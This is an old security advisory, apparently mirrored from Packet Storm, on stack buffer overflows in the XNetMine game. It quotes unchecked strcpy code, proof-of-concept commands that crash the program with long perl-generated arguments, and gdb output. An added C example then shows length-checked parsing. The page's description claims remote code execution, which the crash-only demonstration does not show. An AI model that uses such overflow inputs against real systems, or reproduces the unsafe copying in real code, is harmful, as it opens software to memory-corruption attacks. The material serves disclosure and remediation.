XNetMine.txt

Date: 20 Oct 2006 00:00:00 | Reported by: federico | Type: packetstorm | Source: packetstormsecurity.com | 36 views

Vulnerable XNetMine software allows for remote code execution through command line inputs, leading to a segmentation fault

Code
`
//  
  
Vendor: Martin Bauer  
Software: http://ibiblio.org/pub/Linux/games/multiplayer/XNetMine.tgz  
  
*Vulnerable code:*  
--   
line: 672/676  
  
if (strncmp("-PortNumber",argv[t+1],11)==0)  
{ char text[500];  
strcpy(text,argv[t+1]);  
strcpy(Port,&text[11]);  
}  
--   
line: 677/682  
  
if (strncmp("-Name",argv[t+1],5)==0)  
{  
char text[500];  
strcpy(text,argv[t+1]);  
strcpy(User,&text[5]);  
}  
--   
line: 683/688  
  
if (strncmp("-ServerName",argv[t+1],11)==0)  
{  
char text[500];  
strcpy(text,argv[t+1]);  
strcpy(ServerName,&text[11]);  
}  
--   
  
*Proof of concept:*  
--   
federico XNetMine % ./XNetMine -Server -PortNumber`perl -e 'print "A"x498'`  
Server:1094795585 Client:0 PortNum:AAAAAAAAAAAAAAAAAAAAAAAAAAA(...)   
ServerName:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)"  
Segmentation fault  
  
federico XNetMine % ./XNetMine -Server -PortNumber31337 -Name`perl -e 'print "A"x504'`  
Server:1 Client:0 PortNum:AAAAAAAAAAAAAAAAAAAAAAAA  
Name:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)" ServerName:""  
Segmentation fault  
  
federico XNetMine % ./XNetMine -Server -PortNumber31337 -Name31337 -ServerName`perl -e 'print "A"x504'`  
Server:1 Client:0 PortNum:31337  
Name:"31337" ServerName:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)"  
Segmentation fault  
--   
  
*Debug information:*  
--   
(gdb) p $eip  
$1 = (void (*)()) 0x804a862 <main+753>  
(gdb) stepi  
Program terminated with signal SIGSEGV, Segmentation fault.  
The program no longer exists.  
SIGSEGV 0x0804a862 in main ()  
  
-- federico  
[email protected] / http://defsol.plugs.it/  
  
//  
  
`
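
The three blocks quoted in the advisory copy a command-line argument into `char text[500]` and then into `Port`, `User` or `ServerName` with `strcpy`, with no length check at either step. The following is an added example, not code from XNetMine or from the advisory, showing one length-checked way to parse the same three options. The buffer sizes, the helper names `parse_opt` and `parse_args`, and the loop over `argv[t]` are assumptions, since the page does not show those declarations.

```c
#include <stdio.h>
#include <string.h>

/* Assumed sizes: the advisory does not show how Port, User and
 * ServerName are declared in XNetMine. */
#define PORT_LEN 16
#define NAME_LEN 64
static char Port[PORT_LEN], User[NAME_LEN], ServerName[NAME_LEN];

/* parse_opt (hypothetical helper): copy the value that follows `prefix`
 * in `arg` into dst. Returns 1 if stored, 0 if arg has another prefix,
 * -1 if the value does not fit in dst_len bytes (dst is left empty). */
static int parse_opt(const char *arg, const char *prefix,
                     char *dst, size_t dst_len)
{
    size_t plen = strlen(prefix);
    if (arg == NULL || dst_len == 0 || strncmp(prefix, arg, plen) != 0)
        return 0;
    const char *val = arg + plen;   /* no intermediate text[500] copy */
    size_t vlen = strlen(val);
    if (vlen >= dst_len) {          /* reject instead of truncating */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, val, vlen + 1);     /* length checked; copies the NUL */
    return 1;
}

/* Returns 0 if every option fits its buffer, -1 on the first that does not. */
static int parse_args(int argc, char **argv)
{
    for (int t = 1; t < argc; t++) {
        if (parse_opt(argv[t], "-PortNumber", Port, sizeof Port) < 0 ||
            parse_opt(argv[t], "-Name", User, sizeof User) < 0 ||
            parse_opt(argv[t], "-ServerName", ServerName, sizeof ServerName) < 0)
            return -1;
    }
    return 0;
}

int main(int argc, char **argv)
{
    if (parse_args(argc, argv) != 0) {
        fprintf(stderr, "option value too long\n");
        return 2;
    }
    printf("PortNum:%s Name:\"%s\" ServerName:\"%s\"\n", Port, User, ServerName);
    return 0;
}
```

With these checks, the 498- and 504-byte arguments from the proof of concept are rejected with exit status 2 before any copy takes place.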

Vulners AI Score: 7.4 (High risk)